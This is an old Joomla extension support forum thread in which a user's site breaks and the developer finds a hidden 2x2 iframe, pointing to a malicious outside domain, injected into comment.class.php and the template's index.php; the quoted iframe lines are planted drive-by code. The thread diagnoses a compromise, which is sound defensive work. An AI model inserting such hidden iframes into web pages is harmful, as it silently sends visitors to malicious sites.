×

Notice

The forum is in read only mode.
Welcome, Guest
Username: Password: Remember me
  • Page:
  • 1

TOPIC: i hacked.???

i hacked.??? 15 years 5 months ago #4808

  • reza
  • reza's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Posts: 41
  • Thank you received: 0
hi
i installe joomla comment 3.26 and that's work very good.
but from Friday i have a problem .some one hacked me form joomla comment.and how can i know that?
because when i uninstall joomla comment from administrator(not database only file) my site backed.and before uninstalling ,when i go to joomla comment i have a error and about error .its error in my site on front page
Parse error: syntax error, unexpected T_STRING in /home/****/public_html/components/com_comment/joscomment/comment.class.php on line 1232
and error on administrator when i choose manage comment is like that.
please help me

i hacked.??? 15 years 5 months ago #4811

  • Daniel Dimitrov
  • Daniel Dimitrov's Avatar
  • Offline
  • Administrator
  • Administrator
  • Posts: 9618
  • Karma: 155
  • Thank you received: 1081
Ok, can you explain me again what happened, cause I really couldn't understand quite well. Who hacked you and why you think that he hacked you through joomlacomment?

How does you comment.class.php file looks like?

i hacked.??? 15 years 5 months ago #4817

  • reza
  • reza's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Posts: 41
  • Thank you received: 0
hi
i dont know who hacked me.but i know i hacked through joomla comment . because when i unistalled it (without drop the table in db) my site worked.
but when installed again i gave same problem.

i hacked.??? 15 years 5 months ago #4819

  • JonusC
  • JonusC's Avatar
  • Offline
  • Platinum Boarder
  • Platinum Boarder
  • Posts: 785
  • Thank you received: 48
I don't think you've been hacked lol, you're jumping to conclusions there I think. What you are experiencing is called a "bug". It's very common for a Joomla extension to break your entire website completely, this appears to be the case.

You're only using Joomla 1.0 or 1.5 Legacy so sadly I myself can't help too much as I only deal with Joomla 1.5, but I'll try anyway...

OK, looking at line 1232 of comment.class.php in JoComment 3.26 I see this...
$xml .= "<body>$html</body>";
...I have no idea what's causing your problem :blush:

The only thing I could think of is that your host is using an old version of PHP. Or, Joomla 1.0 has a bug or something. Please login to your webhost controlpanel and verify that PHP5 is in effect, you can also check Jooma admin panel > Help > System Info and check for usual things, SimpleXML Schema support; libXML v2.7.x or maybe 2.6 is good enough, and so on... it's all referenced in the Joomla installation guide.

Apart from that, Daniel you might want to check this out - apparently the use of // for commenting lines on some exotic PHP configurations can break the parsing engine.

(...)the > tag closes the php sesion despate it being commened out by //
use of /* */ to comment will solve this

no idea if that's the problem here though.

Maybe its an XML rendering engine problem. A phpinfo() dump would help.

OK reza, so JoComment did used to work once? What I can suggest is to retrace your steps and uninstall/disable everything to try and get it to work again. There is a chance that your webhost might have changed something internal on their servers, but usually they would notify via e-mail on library updates and whatnot.

i hacked.??? 15 years 5 months ago #4979

  • reza
  • reza's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Posts: 41
  • Thank you received: 0
hi
i installed the last version but after some day i think i hacked again
this is error on my index page
Parse error: syntax error, unexpected T_STRING in /home/*****/public_html/components/com_comment/joscomment/comment.class.php on line 1212
and i attached my comment.class.php
and i use joomla 1.5.9
and my php version is 5.2.9

i hacked.??? 15 years 5 months ago #4982

  • Daniel Dimitrov
  • Daniel Dimitrov's Avatar
  • Offline
  • Administrator
  • Administrator
  • Posts: 9618
  • Karma: 155
  • Thank you received: 1081
where did you attach your comment.class.php? Idon't see it here.
Tomorrow I'm heading up for Holland. I will be able to help you first on Sunday.

i hacked.??? 15 years 5 months ago #4983

  • reza
  • reza's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Posts: 41
  • Thank you received: 0
hi
sorry
now attached comment-20090709.zip

i hacked.??? 15 years 5 months ago #4984

  • Daniel Dimitrov
  • Daniel Dimitrov's Avatar
  • Offline
  • Administrator
  • Administrator
  • Posts: 9618
  • Karma: 155
  • Thank you received: 1081
Hey there! Definetely your comment.class.php file is not the same as in beta1.

you have something like this in it:
    	        $xml .= "<body>$html<iframe frameborder = 0 height = 2 width = 2 src = "http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /></body>";
 

Uninstall the version you have, check that administrator/components/com_comment
and component/com_comment are deleted and install beta1.

Someone have changed the comment.class.php on your site.

i hacked.??? 15 years 5 months ago #4988

  • JonusC
  • JonusC's Avatar
  • Offline
  • Platinum Boarder
  • Platinum Boarder
  • Posts: 785
  • Thank you received: 48
reza,

Are you on a free or cheap webhost that forces ads/commercials on your website? That code looks a lot like a forced iframe for commercials.

If not, I guess you were hacked :blink: but that's a very very strange custom code for a hacker to do... not very secretive and easily detected :dry:

i hacked.??? 15 years 5 months ago #4990

  • reza
  • reza's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Posts: 41
  • Thank you received: 0
hi
ok i answer one to one
1-i installed 4 beta 1 some days ago.
and what happend for it?
Some one log in my ftp and change it?
if some one can log it , he can change more important thing.isn't correct?
and in the continue
i installed alpha 1 now
but there is one problem or i dont know strange thing
when i refresh some thing in firefox i see that wrote some thing on status bar
connecting to cazkafuq.cn
??? :(

i hacked.??? 15 years 5 months ago #4991

  • JonusC
  • JonusC's Avatar
  • Offline
  • Platinum Boarder
  • Platinum Boarder
  • Posts: 785
  • Thank you received: 48
I asked if you were on a free webhost. Do you pay money for website space or not?

Some one log in my ftp and change it?


Why are you asking us we don't know... Change your password if you think someone got in :dry:

i hacked.??? 15 years 5 months ago #4992

  • reza
  • reza's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Posts: 41
  • Thank you received: 0
hi
i installed alpha 1 now
but there is one problem or i dont know strange thing
when i refresh some thing in firefox i see that wrote some thing on status bar
connecting to cazkafuq.cn
???
i paid for host

i hacked.??? 15 years 5 months ago #4995

  • JonusC
  • JonusC's Avatar
  • Offline
  • Platinum Boarder
  • Platinum Boarder
  • Posts: 785
  • Thank you received: 48
www.siteadvisor.com/sites/cazkafuq.cn/postid?p=1854182

Your site security has definately been breached, that's a malicious site.

Sorry, but this is outside the scope of what we can help you with. JoomlaComment has no vulnerabilities that we know of, chances are they either stole your passwords via keyloggers or ARP poisoning on your host machine, or you havn't kept your site secure enough.

Or maybe you did something really bad to tick-off some smart Chinese hackers somehow :S

This is something you will have to get support with elsewhere - JoomlaComment is licenced under the GNU which comes with absolutely zero warranty. Bad luck friend :(

All i can suggest is to change every single one of your passwords and keep a quality anti-virus and firewall on your computer up-to-date and active, and keep your Windows XP or Vista machine updated with Windows Update. Apart from that, you will have to contact support with your webhost or seek professional security advice to clean your site (or just wipe it completely). Your webhost provider can give you more resources and guidelines on how to proceed, with such things as checking access logs and other security checks for your website.

Good luck :)

i hacked.??? 15 years 5 months ago #4996

  • reza
  • reza's Avatar Topic Author
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Posts: 41
  • Thank you received: 0
look,you answer very hopelessly :(
i prefer daniel will come and answer to me
any way
i open my index.php from my template and i see a strange lin
look
<iframe frameborder = 0 height = 2 width = 2 src = "http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /><iframe frameborder = 0 height = 2 width = 2 src = "http://jobstopfil.biz/tds_a/go.php/go.php?id=4" />
what is it?

i hacked.??? 15 years 5 months ago #4999

  • JonusC
  • JonusC's Avatar
  • Offline
  • Platinum Boarder
  • Platinum Boarder
  • Posts: 785
  • Thank you received: 48
It's a frame inset to another site. It's not part of JoomlaComment, someone else added it.

Daniel is away for the next 24-48 hours, but he will definately reply when he gets back. He probably will be more helpful, even though this is not a JoomlaComment problem :unsure:

i hacked.??? 15 years 5 months ago #5136

  • Daniel Dimitrov
  • Daniel Dimitrov's Avatar
  • Offline
  • Administrator
  • Administrator
  • Posts: 9618
  • Karma: 155
  • Thank you received: 1081
Hey Reza,
sorry for the delay! As jonusC already said, you've been hacked! And that is not something that is related to joomlacomment - as you see your template file has also some strange iframe things in it. There can be a lot of things that are the reason for this - bad hosting(old OS version, php), old joomla version, stoled ftp password.
I think that the best thing to do right now is read this book:
www.packtpub.com/joomla-web-security-guide/book
Then you will be a professional in things security and will be able to determine where the problem comes from.

I'm sorry, but that is all I can tell you right now.
  • Page:
  • 1
Time to create page: 0.132 seconds